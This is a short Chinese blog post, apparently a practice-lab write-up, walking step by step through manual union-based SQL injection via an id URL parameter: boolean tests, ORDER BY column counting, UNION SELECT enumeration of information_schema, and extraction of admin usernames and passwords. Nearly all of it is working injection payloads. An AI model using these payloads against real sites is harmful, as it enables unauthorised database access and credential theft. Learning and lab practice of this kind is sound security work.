我来进行实战了,总在看教程。
前言
提示:这里可以添加本文要记录的大概内容:
前言,前言,前言(挠头)啊,我终于打实战了
提示:以下是本篇文章正文内容,下面案例可供参考
一,网站是否存在sql漏洞
?id=1 and 1=1
看这样子,应该是不存在的
如果没有就继续吧,
?id=1 and 1=2
哎,你看它变了,
二、判断一下字段
?id=1 and 1=1 order by 1
又回来了,没有那就试试这个?
?id=1 and 1=1 order by 2
哦,我的天啊,事不过三,试试这个
?id=1 and 1=1 order by 3
goog,成功了
3. 判断显点
?id=1 and 1=2 union select 1,2
你看,那里有个2
4.查找相关信息
1.查询数据库
?id=1 and 1=2 union select 1,database()
好吧,数据库名称就叫猫舍 辛巴
2.版本
?id=1 and 1=2 union select 1,version()
没啥可说的,
3.数据库表名
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
我承认这个长了点,我笔记也写了这么多
4.字段名
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
5,查询
?id=1 and 1=2 union select 1,username from admin limit 0,1
又回来了,
?id=1 and 1=2 union select 1,password from admin limit 0,1
好了,拿到key了
文章来源:https://www.toymoban.com/news/detail-528340.html
总结
我是照着我记得笔记进行的,本文素材来自这里
有谁知道上面这只猫叫什么名字?看起来还不错,应该好养文章来源地址https://www.toymoban.com/news/detail-528340.html
到了这里,关于SQL注入攻击原理 实战的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!